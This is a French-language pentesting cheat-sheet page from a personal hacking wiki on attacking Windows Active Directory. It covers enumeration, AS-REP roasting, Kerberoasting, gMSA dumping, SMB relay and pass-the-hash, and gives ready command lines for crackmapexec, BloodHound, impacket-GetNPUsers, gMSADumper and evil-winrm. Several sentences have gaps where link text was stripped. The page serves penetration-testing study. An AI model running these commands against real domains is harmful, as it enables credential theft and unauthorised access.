Nerumir
  • Bienvenue
    • Accueil
    • Mes vidéos
  • 😈Hacking
    • Ressources
    • Mes outils
    • Plan d'exécution
    • Énumération
    • Fast Searching
    • Active Directories
    • Évasion d'AV
    • Privilege Escalation
    • Dissimulation
    • Cryptographie
    • PowerShell
  • 👨‍💻Programmation
    • Sémantique des langages
    • Installation de Linux
    • Vim & IDEs
    • Git
    • JavaScript (client)
      • Les variables
      • Parcourir le DOM
      • Analyser et modifier du HTML
      • Les conditions
      • Les boucles
      • Les fonctions
      • Évènements et Listeners
      • Les possibilités du JavaScript
      • Exercice : Slider
      • Exercice : Liste de courses
Propulsé par GitBook
Sur cette page
  • Non authentifié
  • Authentifié

Cet article vous a-t-il été utile ?

  1. Hacking

Active Directories

PrécédentFast SearchingSuivantÉvasion d'AV

Dernière mise à jour il y a 1 an

Cet article vous a-t-il été utile ?

Les AD (Active Directories) sont des annuaires . Sur une machine avec un AD, est généralement présent un ensemble de services de partage de ressources centralisées sur un réseau d'ordinateurs (généralement Windows) avec un système d'identification et d'authentification.

Il existe deux difficultés dans la pénétration d'AD :

  • Pénétration via authentification (Les protocoles d'authentifications sont NTLM et Kerberos)

  • Escalade de privilèges (Via analyse des permissions et accès de l'utilisateur pawned)

Plusieurs services peuvent être observés sur un AD :

  • port:88 (service d'authentification Kerberos)

  • RPC port:135/593 (Remote Procedure Call)

  • LDAP port:389/636 (Consultation de l'annuaire AD)

  • SMB port:445 (service de partage de ressources qui permet d'accéder à ces ressources)

  • WinRM port:5985/5986 (Remote Shell)

Authentifié ou non, permet de lister à peu près ce que l'on souhaite. Sinon si ça ne marche pas. On peut aussi utiliser pour se connecter au service SMB.

#Enumérer les users|groups|shares|pass-pol
sudo crackmapexec smb <IP> -u <user> -p <mdp> --groups|users|shares|pass-pol

Non authentifié

Ne pas confondre hash qui peut être utilisé pour l'authentification via du PtH (Pass the Hash) et qui ne peuvent pas être utilisés comme ceci et doivent être bruteforce.

  • Si le service RPC existe, essayer d'énumérer des informations utilisateurs avec .

  • Vérifier si on peut s'identifier sans mdp ni user.

  • On peut récupérer beaucoup d'informations avec si un service ldap tourne. (Peut fonctionner en non authentifié)

  • SMB Relay : Attaque permettant d'avoir l'accès de l'utilisateur lors de sa tentative de connexion. Si SMB Signing est activé sur la machine, l'attaque est impossible.

  • On peut énumérer les utilisateurs de Kerberos avec ou .

  • AS_REP Roasting : Possibilité d'obtenir le sans avoir le mdp (l'utilisateur ciblé doit avoir la pré authentification désactivée). Permet ensuite de cracker le hash en bruteforce en local.

Authentifié

#Installer Java si besoin pour Neo4j
sudo apt-get install openjdk-11-jdk
#Installer Neo4j
sudo apt-get install apt-transport-https
sudo add-apt-repository universe
sudo apt install neo4j
#Installer BloodHound
sudo apt install bloodhound
#Lancer neo4j (accessible via https://localhost:7474/)
sudo neo4j console
#Lancer BloodHound
bloodhound
#Générer les json à charger dans BloodHound.
python3 -m pip install bloodhound
bloodhound-python -u username -p 'mdp' -ns ip_du_serveur -d domaine.local -c all
#Non authentifié : Vérifier parmis une liste d'utilisateurs si ils sont AS_REP Roastsable
impacket-GetNPUsers domain/ -usersfile <users_file> -format [hashcat|john] -outputfile outfile
#Authentifié : Vérifier les comptes AS_REP Roastable pour tous les utilisateurs
impacket-GetNPUsers domain/user:passwrd -request -format [hashcat|john] -outputfile outfile
#Consulter la date de votre machine
date
#Télécharger rdate (remote date)
sudo apt install rdate
#Consulter la date de la machine distante
rdate -p <IP>
#Synchroniser votre date avec celle de la machine distante
rdate -s <IP>
python3 gMSADumper.py -u user -p password -d domain.local
#Connexion WinRM avec mot de passe
evil-winrm -u <username> -p <password>  -i <IP>/<Domain>
#Connexion WinRM avec Pass the Hash NTLM
evil-winrm -u <username> -H <Hash> -i <IP>

On peut lancer pour commencer à trouver des chemins d'attaque et consulter les fichiers et permissions et groupes de chaque utilisateur de manière simple et efficace :

Une fois authentifié, on peut lister tous les utilisateurs de l'AD afin de récupérer leur nom et vérifier qu'aucun ne sont vulnérables à l'.

: On peut demander les de tous les comptes (Service Principal Name) si on est authentifié. Ils peuvent être bruteforce mais les mdp sont aléatoires. Cependant, si un compte utilisateur est SPN, alors on pourra peut être cracker le mot de passe via son .

On peut obtenir les hashs NTLM des comptes (Group Managed Service Account) auquel notre compte authentifié a accès via du . On pourra donc faire du PtH (Pass the Hash).

Si l'utilisateur authentifié peut gérer le (Domain Controller), alors il aura les permissions pour voir les hashs des mots de passe d'autres utilisateurs. On peut les dump via le module de .

Si l'utilisateur authentifié est dans le groupe , il peut changer le mot de passe et faire plusieurs autres manipulations sur les autres utilisateurs.

On peut choper les hashs avec en faisant exécuter un fichier automatiquement par un utilisateur lorsqu'il entre dans le répertoire concerné en uploadant sur le SMB.

Pour toute action spécifiques, l'exécution de commandes PS () nécessite une connexion à WinRM (avec par exemple), ce n'est pas possible via SMB. On peut cependant essayer diverses méthodes avec .

😈
LDAP
Kerberos
crackmapexec
enum4linux
smbclient
NTLM (LM:NTLM)
Net-NTLMv1/2
rpcclient
ldapsearch
MitM
Kerbrute
crackmapexec
TGT
BloodHound
AS_REP Roasting
Kerberoast
TGS
SPN
TGS
GMSA
GMSA Dumping
DC
secretsdump
impacket
Account Operators
responder
certains types de fichiers
PowerShell
evil-winrm
crackmapexec